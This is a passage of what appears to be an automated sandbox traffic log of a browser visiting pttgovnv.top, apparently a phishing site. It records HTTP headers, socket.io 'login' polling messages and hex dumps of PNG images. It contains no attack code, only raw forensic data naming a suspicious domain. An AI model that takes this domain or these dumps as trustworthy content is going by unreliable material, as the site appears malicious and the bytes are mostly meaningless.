          2024-09-01 22:25:27 UTC1369INData Raw: 05 23 14 71 84 0c 6f 11 07 c1 a6 04 1d 6d 96 26 86 2a e5 35 33 22 4e 2d 08 22 b1 ca 69 09 39 2b 1a 93 43 40 a0 ae 98 ff e4 0f 42 65 99 9a b5 e4 58 01 62 0d 1d a7 9b 84 e3 e4 79 e1 f8 b0 55 a4 d7 f4 c6 7c 5c f4 56 a4 0b d7 f4 3c e1 2a 1d 29 09 bb 22 4b 32 92 c3 39 56 7a c0 62 aa 2e 2f 82 c4 15 74 db 80 60 87 ab 35 9c b6 5d c5 cf 6f 15 b6 bd 91 25 9e c0 fa 76 e1 96 19 11 8d 59 89 c5 92 88 ab 56 9d ab 78 ac c4 ca ad 93 ce d5 65 bc 82 11 8a 38 42 86 af 80 83 60 53 77 68 5f ac ae 0c 1f 8e 88 53 44 57 24 56 39 b5 90 b3 42 c0 79 3f 57 9a e0 dd dd 17 02 2c 41 b0 e2 54 2c 7a 40 d3 1d 17 8e 35 27 1c 6c e7 5b 44 d6 c1 3a e1 38 d2 1a b1 80 88 06 10 25 ae c9 79 a2 73 da 04 4b 8e 45 50 01 ab 61 35 55 40 1c 1c f0 3f 4e fe 65 61 e0 5e cd 2f 9b 13 b6 15 15 c7 a2 f8 f1 5d
          Data Ascii: #qom&*53"N-"i9+C@BeXbyU|\V<*)"K29Vzb./t`5]o%vYVxe8B`Swh_SDW$V9By?W,AT,z@5'l[D:8%ysKEPa5U@?Nea^/]
          2024-09-01 22:25:27 UTC1369INData Raw: df a7 fb d4 42 e0 5e 3d bf f4 63 61 d7 95 8b 07 86 b2 0b 07 6e 82 da e7 8e 15 23 fe 53 ee 2d 7b 42 12 71 e5 1c 55 84 22 8e 90 e4 11 70 55 d2 7f 9b 5c f3 e5 c9 72 60 c0 6e 4b 89 c6 f7 84 63 95 4b 24 37 2a ac 2c 85 bf dd c3 d2 21 51 00 a5 48 9a bf 58 99 30 62 5e 19 ef 48 54 18 aa 5a 80 1d 37 17 8a ce e9 e3 45 cf d8 51 c2 76 e6 7c 6f f1 7f ec 49 f7 bc c4 72 23 64 58 c0 b6 5b 64 b8 b0 4c 1e f0 1d 7d 22 ff 9d 03 29 10 23 d1 00 81 ea 4d 77 5c 2d 2e dc 5b 2e c7 3c 19 b1 20 e8 09 38 04 b3 67 17 96 c5 85 80 2b fa d9 07 14 70 51 02 fb 15 fb 37 5a 63 33 2a db dc d6 21 77 73 88 a5 80 83 d8 c5 8d cf e9 1f 5e 2b 9c d7 cf 96 05 9c 7c ee 65 d8 1b fd cf 77 42 92 1d 5a e2 48 d2 e3 49 68 b8 80 c7 b0 c4 39 b6 75 5c 14 50 f3 4b 45 77 f9 98 a8 b8 b1 8c 58 e5 8c b8 51 8b 2f 5d
          Data Ascii: B^=can#S-{BqU"pU\r`nKcK$7*,!QHX0b^HTZ7EQv|oIr#dX[dL}")#Mw\-.[.< 8g+pQ7Zc3*!ws^+|ewBZHIh9u\PKEwXQ/]
          2024-09-01 22:25:27 UTC1369INData Raw: af 1e 4f ad f5 fb 42 ae 83 6c ee ac 8a 46 59 cc b5 cf 9c 14 cb 5e b0 3e 22 4e c3 a5 5a ce 2c 55 42 11 47 48 e2 a0 b6 c2 55 07 4c 48 b3 33 9c f6 dd dd 05 d1 b2 96 20 36 08 ae a5 70 ca 94 64 16 54 f8 fe 5d 58 2e bb 58 1d 99 05 a2 6c e1 03 3e af 29 a5 45 9a 6a b6 8a c9 d7 3f ec 33 21 1b b5 c2 c9 0d ed 7f 71 c0 d2 7d 60 bb 71 b2 c8 f8 dc 5d c2 b6 e4 0b 43 72 f0 53 f2 8a 24 31 f7 6f f2 d2 bb 73 83 70 6d f8 93 70 fd ea dd a4 19 dc c8 58 3d f3 70 51 58 22 29 1c f1 a6 b8 f3 f5 c0 38 6f 7c 60 d1 50 ec 12 2d 81 86 f3 fe 56 d5 f5 80 35 e3 08 45 1c 21 09 28 e2 d6 fb bf d8 37 c2 26 5d f4 bb 2b a3 7a 72 a1 4c 49 4d bd c8 13 f5 a2 6b 49 9e b8 70 43 a5 ee a4 ab d5 23 15 a2 ee b2 5b 03 e7 1f 14 fb 55 e2 93 32 f3 4a 7c 26 65 33 56 b8 11 6f ee b1 2c 91 01 e2 2d f3 be ff 6d
          Data Ascii: OBlFY^>"NZ,UBGHULH3 6pdT]X.Xl>)Ej?3!q}`q]CrS$1ospmpX=pQX")8o|`P-V5E!(7&]+zrLIMkIpC#[U2J|&e3Vo,-m


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          93192.168.2.449837172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC670OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liMdh&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 49
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC49OUTData Raw: 34 32 33 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 66 33 55 32 44 6f 4a 6a 5a 48 43 50 65 63 57 6b 42 51 55 44 22 2c 5b 22 75 73 65 72 22 5d 5d
          Data Ascii: 423["login","user-f3U2DoJjZHCPecWkBQUD",["user"]]
          2024-09-01 22:25:27 UTC614INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:27 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TUwYcFVGl8S2jxVeKDBtT8Fc93OVwBf8X0xY6tR%2BNHxAwj4udlz6OjzXltC8ayX4B9MS63qBsGoS%2BNDQZT5ROWPWpxPAXnk6KEn%2BejUsGQzo1YtfrAJVL0r%2FzALBPH0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad21fcab42b0-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
          Data Ascii: 2ok
          2024-09-01 22:25:27 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          94192.168.2.449838104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liMU2&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC627INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:27 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 157
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cSs9qnpr041JC%2FPyY5OzUvvtBHGSWdBjMV%2FKF1HlLXnW8xHhrHjZOnZ5a6QnU%2BrHaYItSuz8urYhsDrzENOC64taEZYqWD39Ce%2Bf2cnoOZT1bmGbh7nI%2Bs1TEWw%2B88%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad21f8a3c481-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC157INData Raw: 34 32 5b 22 6f 6e 6c 69 6e 65 2d 63 6f 75 6e 74 2d 75 73 65 72 22 2c 33 2c 22 75 73 65 72 2d 66 33 55 32 44 6f 4a 6a 5a 48 43 50 65 63 57 6b 42 51 55 44 22 2c 74 72 75 65 5d 1e 34 33 33 5b 7b 22 63 6f 64 65 22 3a 30 2c 22 6d 73 67 22 3a 22 6f 6b 22 2c 22 74 69 6d 65 22 3a 22 53 75 6e 20 53 65 70 20 30 31 20 32 30 32 34 20 32 32 3a 32 35 3a 32 36 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 22 7d 5d
          Data Ascii: 42["online-count-user",3,"user-f3U2DoJjZHCPecWkBQUD",true]433[{"code":0,"msg":"ok","time":"Sun Sep 01 2024 22:25:26 GMT+0000 (Coordinated Universal Time)"}]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          95192.168.2.449839172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P6liMdd&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:28 UTC629INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:28 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 1
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=urio%2BWrXLR4NTlpF%2Fz8iUzgkqs850OlfGU%2Be3QrhloAMsU1201jpeRaCjAdJvn%2FYnM%2B3Fu%2BoSN%2BB5qdVqIZNY3KUHO5c4%2B42AdqeM6xwU6tH2xEmwCsDNCnPUtGcGwo%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad227a434337-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:28 UTC1INData Raw: 31
          Data Ascii: 1


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          96192.168.2.449841172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC599OUTGET /help/layout/images/50.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC728INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:27 GMT
          Content-Type: image/png
          Content-Length: 30380
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"76ac-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36236
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BRasL1Lx3ZxE%2BKSojnhyynXlrDLHVbrqHMMtZYaxc%2BA41H1xV2szkKrH2ck7Uu2pIYN%2FgrnGqc3ssJfWsseyU8lXogkUocr%2B2aLfyfqDJGJVVTrZjN82KzM5g4B3SF4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad22af2e4364-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC641INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 76 39 49 44 41 54 78 da ec 9d 09 7c 15 d5 d9 ff cf cc dd ef cd be 87 04 12 08 fb 4e 02 84 7d 11 10 14 a1 8a 8a ad 56 da 17 fb 6a ab 6f 6d ab 6f b5 d5 f7 5f 6b 5b ed ab 7d b5 d5 b7 da 57 5b 68 a5 6a 5d 91 7d 91 7d 27 40 20 ec 04 08 24 24 21 fb 7e f7 3b f7 ce 7f ce 99 99 9b 9b 3d 81 90 05 7f df 8f 38 e7 de dc 99 39 73 e6 cc cc 6f 9e e7 9c e7 e1 44 51 24 00 00 00 00 00 a0 77 c1 41 c4 01 00 00 00 00 40 c4 01 00 00 00 00 00 88 38 00 00 00 00 00 00 11 07 00 00 00 00 00 11 07 00 00 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<v9IDATx|N}Vjomo_k[}W[hj]}}'@ $$!~;=89soDQ$wA@8
          2024-09-01 22:25:27 UTC1369INData Raw: 00 00 00 10 71 00 00 00 00 00 00 22 0e 00 00 00 00 00 22 0e 00 00 00 00 00 40 c4 01 00 00 00 00 00 88 38 00 00 00 00 00 00 11 07 00 00 00 00 00 11 07 00 00 00 00 00 20 e2 00 00 00 00 00 00 44 1c 00 00 00 00 00 44 1c 00 00 00 00 00 80 88 03 00 00 00 00 00 10 71 00 00 00 00 00 10 71 00 00 00 00 00 00 22 0e 00 00 00 00 00 40 c4 01 00 00 00 00 40 c4 01 00 00 00 00 00 88 38 00 00 00 00 00 00 11 07 00 00 00 00 00 20 e2 00 00 00 00 00 20 e2 00 00 00 00 00 00 44 1c 00 00 00 00 00 80 88 03 00 00 00 00 80 88 03 00 00 00 00 00 10 71 00 00 00 00 00 00 22 0e 00 00 00 00 00 22 0e 00 00 00 00 00 40 c4 01 00 00 00 00 00 88 38 00 00 00 00 00 88 38 00 00 00 00 00 00 11 07 00 00 00 00 00 20 e2 00 00 00 00 00 00 44 1c 00 00 00 00 00 44 1c 00 00 00 00 00 80 88 03 00 00 00 00
          Data Ascii: q""@8 DDqq"@@8 Dq""@88 DD
          2024-09-01 22:25:27 UTC1369INData Raw: a4 5a 0c 8e 0c 66 df 4f 4f 4d b0 7e 77 66 ff 7b 02 7f 5b f7 7f 2b 9e a3 4b d7 91 63 06 69 c1 c6 cb 69 fa c6 13 f3 b7 1f f8 0c 2d 09 00 80 88 03 00 80 2e 80 66 61 a0 cb 55 1b cf 4d d5 ea e4 db 93 ce 62 24 62 b8 99 95 7f 76 e7 a0 61 53 06 87 17 aa bf 77 ac fe 6a a1 7b e7 ae 97 95 8f 1c c7 c9 6e 57 4d bf c4 b3 68 4d 00 c0 ed 0e dc a9 00 00 00 00 00 bd 90 2e b5 c4 59 57 fe f3 49 cf 89 53 cb e4 0f d6 b8 7a 29 c9 09 01 3f a3 ee 10 ae 83 9b 6e 71 1d d1 eb d3 12 bd ce c9 5e d3 4d a6 72 d3 bd f7 3c 46 cb c6 d9 33 b2 7b da c9 a8 7b 6f c5 73 52 fb 3c cc ea ea 72 87 75 45 fb 10 9f a8 0d 6c 2b f3 43 f7 b1 c1 e2 c6 85 0b 0e 74 b4 fe 55 3f fe f9 61 b1 a2 7c 88 d2 d6 15 37 54 9f 8e 1e 98 c7 63 e1 a3 22 cf 6a 47 8e 58 4d 3f 07 2d 7f f4 dd 9e 7a b1 b1 f6 a9 ac 60 c9 da 39
          Data Ascii: ZfOOM~wf{[+Kcii-.faUMb$bvaSwj{nWMhM.YWISz)?nq^Mr<F3{{osR<ruEl+CtU?a|7Tc"jGXM?-z`9
          2024-09-01 22:25:27 UTC1369INData Raw: 8b d9 91 fa 87 4b 98 cc 44 93 18 ef 1f 9f 96 95 6f 65 ae a5 2a ab 93 09 0a 5e fd 5d ab 22 4e 6e 37 fa 2c 15 c5 fa 36 a4 e2 4c c5 1b f8 3d 2d 07 fc 8d ae c8 b9 3c ac 78 d1 e9 21 39 b5 8e e5 b4 bc ff 4a e5 f2 c4 50 23 13 96 e9 29 e1 ef fe 60 56 f2 db b7 f3 83 c5 ed f6 30 17 a1 cd 66 7f bc b6 d6 2a ca ed ce 8f 14 04 c1 d0 f6 ba ee 20 5b 5d 1d 1b 1b a9 91 fa 84 4e ab 65 43 3c 1c 76 7b 03 21 e3 72 b9 83 24 21 f4 0c db 4f 5d 9d f4 ae 2e cb 79 a7 d3 19 d4 d1 fa ba 9c 6e 8b d5 6a 63 c3 0e ac 75 75 c4 66 b7 b7 6b 9c a3 b4 af 50 79 1d eb 10 a9 1f 0e 71 38 9d 33 58 1f 11 bc 1f 04 fe ee c3 8f 3f 61 63 9d af 5e cd 9b 53 5a 56 b6 84 f5 5f 41 20 16 b3 d4 67 b5 3a a2 ac 23 ed 57 7e c9 93 84 d7 fc aa 6a d9 de 30 74 d8 50 3a 04 a2 45 11 e7 55 da b4 ba ba 76 4e e0 75 af d1
          Data Ascii: KDoe*^]"Nn7,6L=-<x!9JP#)`V0f* []NeC<v{!r$!O].ynjcuufkPyq83X?ac^SZV_A g:#W~j0tP:EUvNu
          2024-09-01 22:25:27 UTC1369INData Raw: 4c 89 db bf ff 00 9b 34 31 2d 60 dc 28 e8 fd c0 9d 0a 00 00 00 00 d0 0b 81 25 0e 00 d0 e9 50 17 2a b5 c0 d1 b2 b7 b8 a6 de 85 4a 6f 3a 4a 56 06 8d c5 40 16 8f 8e 65 11 f8 ff 7d 76 ff 37 1b 6f c3 b9 5e 8e da ef 3e 7c 2c a9 a5 fd 18 86 0f 25 fa b1 a3 3f 6e fc 7d 61 a5 23 4d e3 92 8d 21 2e 9f d8 46 80 df ae 87 6b 94 c7 55 75 af d6 55 d9 c8 a1 33 a5 2c 48 b1 5e ab d9 2f fd 6c 1a 2d cf 1c 02 8b 5c 6f 40 14 95 60 d5 7c 7d 88 91 a8 c8 c8 ec c8 c8 a8 1d ac 4f 3b 9c 73 ea 6a e5 80 be 6e 97 eb 49 9f d7 a7 ad b3 d6 c5 d2 cf c9 fd fa ed 4d 4f 9f d8 a1 ac 1e 2e b7 3b c8 a7 58 b6 69 9e f0 a0 60 79 a6 b6 db e9 24 a2 cf a7 76 36 ea ba 5d 76 2e 3b 9b 85 df 99 36 6d ea 9b 38 53 10 71 00 00 d0 2c 74 26 2a 1d 03 a7 ba 50 99 80 53 34 0b 8d 4a 6f 08 91 87 e7 a4 0e 8c 24 33 86
          Data Ascii: L41-`(%P*Jo:JV@e}v7o^>|,%?n}a#M!.FkUuU3,H^/l-\o@`|}O;sjnIMO.;Xi`y$v6]v.;6m8Sq,t&*PS4Jo$3
          2024-09-01 22:25:27 UTC1369INData Raw: 6f 14 3e 40 e4 3a 38 12 b9 b5 75 c4 5e d5 0f 45 6f 2f 6f 1f ae b9 3a 77 a4 3e 1d 38 a6 5e fa 82 de ad ed d3 29 83 c3 5e 59 97 fd 1e 5d 7e be 2b 67 96 c3 2a 6b 28 9d 4e db 44 88 a8 e3 e2 e6 0d 8c ac 7e 7c 76 f2 f4 d6 b6 69 ff e8 d3 65 ae 8c cc 70 9f d7 1d 20 dc 9a 3f 16 be 5f df 33 74 69 bc 77 71 93 04 e1 15 36 f7 50 ba 14 1c 6e 8e 5a 23 d8 b6 3a 30 26 4e 15 62 5c 07 02 cb dd c8 3a ed ed 2e 1c 2f 1f bc e0 f5 71 2e 87 dc 36 3b 2f 94 3d 3b 32 31 e4 5f 0b 46 c5 64 f6 d4 8e ee 13 c5 c0 3e 27 d6 1f 50 db 4d c4 71 2c c6 1a a7 9e 7d 5e 39 8f 06 83 be ba 3d d7 16 09 c8 96 70 a3 d7 27 df fe 6b 85 6b b0 e4 e4 03 57 44 61 87 98 3d 6b 46 76 6e 5e de 29 45 c4 71 aa 05 b9 d6 5a f7 72 d1 f5 eb b2 68 4f 4b dd 51 53 5b 93 24 2a 01 e9 e8 b5 a1 37 18 d8 c4 87 b0 b0 b0 3c 9f
          Data Ascii: o>@:8u^Eo/o:w>8^)^Y]~+g*k(ND~|viep ?_3tiwq6PnZ#:0&Nb\:./q.6;/=;21_Fd>'PMq,}^9=p'kkWDa=kFvn^)EqZrhOKQS[$*7<
          2024-09-01 22:25:27 UTC1369INData Raw: 9f ab aa ab 5f d0 6a b5 cd b6 a7 db 2d 4f b8 89 8c 88 78 75 c2 f8 b4 17 71 c7 84 88 03 00 f4 10 9e f9 f8 f4 f6 0f 32 ae dd c1 7b 95 b1 59 9a e6 8d f7 54 c0 f9 ec 2e 56 9e 3c 71 a0 f0 e2 e2 61 d1 2d 6d d3 93 71 94 3d 40 9c 5f ac 7f 46 28 2e 6c d7 34 63 4e 23 8f 07 33 dd bf e8 31 e3 5d f3 9b 0d af b1 64 42 c2 46 e9 9f a9 33 8e 7b db 99 b2 31 db ce 96 bc f2 69 56 11 73 a9 d9 af 56 f8 c7 28 f1 52 1b 68 75 dd 77 eb a4 fb 37 39 3d e4 d3 23 05 6c 96 70 64 90 3e 67 71 6a fc 8e 9e d8 7f c2 42 c3 f2 2c 16 0b 3b 5f 2e a7 6b 9a 2a 04 24 a1 36 f5 37 bf 7b f5 03 59 93 6a 04 8f 57 30 da ad 76 26 9a 9c 4e c7 fc 7a bd ca 9f 0d 0d 0b 2b 68 6e db f4 7c 88 ca 8b 43 c0 6c 58 62 b3 d9 89 c3 e1 6c 5e 9c 4b a2 d0 6c 36 b3 72 78 58 58 83 f1 6c 41 c1 96 12 ba ac b3 5a 25 61 e2 a1
          Data Ascii: _j-Oxuq2{YT.V<qa-mq=@_F(.l4cN#31]dBF3{1iVsV(Rhuw79=#lpd>gqjB,;_.k*$67{YjW0v&Nz+hn|ClXbl^Kl6rxXXlAZ%a
          2024-09-01 22:25:27 UTC1369INData Raw: 45 76 67 d6 f5 d1 47 1f a1 fd ad d3 fa 9c 1a ca 44 5a be 7e 23 eb cf 9a 35 4b c9 b7 3a eb a5 1b ad c3 8f ff e3 a9 36 d7 fd de b2 47 d5 58 73 2b 71 e7 ec 5d ef e8 00 00 00 00 00 a0 17 d1 d5 6f 70 22 e9 dd 09 de 6f 31 2c d4 78 6f 6e 9f ee 4e f0 de d3 b9 85 ed 53 1f 9c 23 70 db 1c af 25 ba 51 c3 99 9b 48 3f 3e b5 45 6b c5 1f 36 5d fa 9f 55 19 f9 77 d0 b2 a7 a4 56 d4 06 24 8f a7 6e c2 e6 92 bb d3 7c a9 33 86 c7 30 eb d4 b2 69 49 0b 5b da b6 fb 44 56 90 ed 33 79 1c 9c 37 27 4f 6c 5c ef b6 8e 57 37 62 70 8e e9 9e 85 4f f5 94 93 38 75 50 78 9e 5e cb 7d 9b 96 77 65 97 97 e6 28 96 b8 e6 da a8 d3 3a 4e 73 db 56 72 61 56 db dc fd f0 28 03 00 22 ae 4b 54 0a e9 dd 09 de 6f f5 33 de db cb db a7 bb 13 bc f7 78 95 7e ab da 47 6c d4 22 54 bc 51 0c 63 46 12 d3 5d 73 9f a5
          Data Ascii: EvgGDZ~#5K:6GXs+q]op"o1,xonNS#p%QH?>Ek6]UwV$n|30iI[DV3y7'Ol\W7bpO8uPx^}we(:NsVraV("KTo3x~Gl"TQcF]s
          2024-09-01 22:25:27 UTC1369INData Raw: 06 2d 6b 34 da 99 21 a1 21 2c 8f e7 89 ac 93 07 02 72 7b 92 dd bb f7 0e 39 79 ea d4 a3 b4 7c ed 5a fe 34 8e 97 43 d1 54 55 d7 bc b8 60 fe dc 8c ce 3a 96 dd bb 76 0f 59 b7 61 d3 7b b4 6c 30 1a 66 fa 7c e2 46 5a de be 6b 67 de 2f 9f ff 79 87 32 89 bc ff b7 15 cf 5c cb cb 9f 4a cb 1e 41 58 22 d0 bc c6 ea 5b 93 a4 42 b5 1a 75 8c 2a b7 71 dd fa 4d 2c 2e cf ac 19 d3 5f 8d 88 8a ca 96 eb b2 eb e5 ca aa aa 14 e9 58 17 aa d7 6a bb de 91 7c 3e ce eb f3 b1 bc b5 b9 f9 d7 de 8f 8b 89 61 c1 b9 f7 ee df ff 42 55 65 d5 72 e5 d8 fc e3 2c 95 b7 2a ce e9 90 87 5e c4 c7 c7 bd 5d 5e 5e ce 32 be cc 9e 3d f3 ac ba e1 ff fd f3 3b 2f 17 14 16 a5 b1 fb 8b 54 27 7a df 60 b3 d9 9b b2 ee f3 2f bf 62 e7 67 c0 80 fe 5b d3 52 53 57 8e 6e 41 14 d2 f3 4a 97 1b 36 6e 7a 47 a3 d1 cc 51 44
          Data Ascii: -k4!!,r{9y|Z4CTU`:vYa{l0f|FZkg/y2\JAX"[Bu*qM,._Xj|>aBUer,*^]^^2=;/T'z`/bg[RSWnAJ6nzGQD
          2024-09-01 22:25:27 UTC1369INData Raw: da 3e fc e2 05 d1 e3 ee f0 f1 35 94 70 d2 67 93 b1 a2 37 9d 9f 23 39 d5 51 59 d7 6a 1e 25 dd a1 e2 14 37 98 68 d6 93 a4 48 53 06 ae 96 ce e5 f4 99 53 0f d3 65 7e 41 c1 cb 54 d0 50 c2 23 c2 fd 2e 47 ea 7e bc 78 f1 f2 b7 d8 f7 a1 e1 79 e3 27 34 3f d1 a1 a6 ae 36 a1 ce 6a 63 ee 58 2a 34 fb f5 eb cb be 1f 3d 7a f4 9b 0b ef 5e d0 38 1b 89 3f 6d 9a 3a 36 6c 4a c0 38 ae 9f fd f4 e9 e7 1b 6f ff 8b 2f bf 62 63 5e 77 ee da 3d df ed 92 af c1 3e 7d fa bc 3f 61 7c 1a 7b 21 8a 8a 8a cc 1e 3b 76 4c b3 c2 76 d6 ac 19 d9 11 91 e1 4c 9c 65 65 9d 72 56 d7 d4 b2 2c 2b d5 55 d5 4c b0 0e 1e 32 98 d5 a7 c5 f1 5f d2 fd c4 e7 95 ef 35 3a 49 c0 25 24 c4 91 31 63 c6 b2 cf c3 87 8f f0 bf 90 66 1d 3f 4e b6 7e bd 5d 16 7e 3a 2d b1 da 6c 4b 8e 1c 3d c6 ea 14 13 15 75 36 b0 ed a4 ed 69
          Data Ascii: >5pg7#9QYj%7hHSSe~ATP#.G~xy'4?6jcX*4=z^8?m:6lJ8o/bc^w=>}?a|{!;vLvLeerV,+UL2_5:I%$1cf?N~]~:-lK=u6i


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          97192.168.2.449844172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC599OUTGET /help/layout/images/51.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC730INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:27 GMT
          Content-Type: image/png
          Content-Length: 23451
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"5b9b-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36236
          Accept-Ranges: bytes
